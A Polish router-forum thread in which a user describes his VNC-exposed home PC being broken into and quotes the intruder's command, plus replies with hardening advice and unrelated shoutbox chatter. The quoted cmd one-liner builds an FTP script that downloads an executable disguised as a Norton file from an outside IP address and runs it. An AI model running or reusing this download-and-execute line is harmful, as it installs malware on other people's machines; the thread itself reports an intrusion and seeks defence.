Może to nie najwłaściwszy dział ale chce żebyście się zapoznali z tym problemem może sie przydać.Odpaliłem usługę DDns na tomato i zainstalowałem na jednym z komputerów VNC do przejmowania pulpitu, ip komputera wpisałem w tomato do DMZ i uzyskałem zdalny dostęp, hasło do VNC było 8 znakowe literowo cyfrowe. Wszystko chodziło jak trzeba dopoki na komputerze przejętym nie zobaczyłem że ktoś próbuje sie odpalic usługę FTP poprzez wpis do /start/uruchom komendę:[b]cmd /c echo OPEN 83.31.207.110 21491>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit ktora spowodowała odpalenie serera FTP na komputerze przejetym. I teraz moje pytanie spotkaliscie sie z czyms takim? Dla mnie dziwne wydaje sie to ze przejecie przez osobę 3 bądź trojana nastąpiło po około 6min po zmianie adresu ip u mnie (neo) więc bardzo szybko adres IP mojego lącza nie odpowiada na ping więc chyba stosowanie skanerów odpada dodatkowo komenda odpalająca tego ftp wpisywała sie bardzo szybko jakby z automatu bądż została wklejona. Nie dziwiło by mnie to gdybym posiadal stały IP i ta usługa była odpalona chociaż pare dni natomiast ten włam nastąpił po około 12h ze zmieniającym sie IP.
I teraz pytanko jak mozna to zabezpieczyc obecnie mam tak ze zmieniłem porty w VNC i kompa wlaczam w dmz tylko wtedy jak potrzebuje przejąc maszynę ale jest to dosyc upierdliwe i nadal występuje ryzyko włamu tylko w kótszym okresie czasu, czekam na rady i sugestie.Edytowany przez stiepa dnia 18-03-2007 11:59
Po pierwsze tak jak sugeruje stegano uaktualnij VNC
Po drugie nie wstawiaj kompa do DMZ tylko przekieruj odpowiedni port na routerze.
Po trzecie używaj UltraVNC (najbardziej zaawansowany i umożliwiający szyfrowanie) + wtyczka szyfrująca
· Łącznie użytkowników: 24,126 · Najnowszy użytkownik: goldi111
Czat
Musisz się zalogować, aby opublikować wiadomość.
servee
24-01-2025 18:18
Światłowód + mediakonwenter. Ekranowana skrętka nie jest wymagana, taką sytuację już zastałem. Zamierzam ją wymienić na zwykłą. Da to coś?
shibby
17-01-2025 07:45
a ta skrętka ekranowana o której piszesz to jakiś wkopany przewód do bramy/furtki/kamer y zewn? Jak tak to jego też przez zabezpieczenie podepnij.
shibby
17-01-2025 07:43
no to pora zabezpieczyć kable LAN zabezpieczeniami przeciwprzepięciow ymi - tanio nie będzie. Jak przychodzi ci internet? Skrętką czy światłem? Jak skrętką to zacząłbym od tego.
servee
12-01-2025 12:52
Ponownie padły mi wszystkie porty sieciowe w routerze - to już 3-ci w 6 m-cy. Podejrzany to ekranowana, nieuziemiona skrętka - 12mb. Czy jest to możliwe?
dawidt
21-12-2024 01:09
siema
Maniek91PL
06-11-2024 22:37
dzięki !
maxikaaz
29-10-2024 14:27
@Maniek91PL - Administration=> Admin Access, i tam masz "Allow Wireless Access" do zaznaczenia
Maniek91PL
26-10-2024 22:07
siemka! ktoś przypomni co się ustawiało jeśli nie mogę wejść od strony wifi do tomato? od lan działa
overflow2
04-10-2024 17:34
Kupowałem Asusy n10u albo n12d1 ale nie widzę ich, chyba już nie produkują, Chodzi o coś nowego i taniego. Transfery niewielkie.
maxikaaz
04-10-2024 09:38
@overflow2 patrząc po dostępności funkcji w nowych kompilacjach, to chyba nawet WRT54G/GL jeszcze ma OpenVPN, albo jakiś odpowiednik... zależy, na jakie transfery liczysz.
' target='_blank'>Link
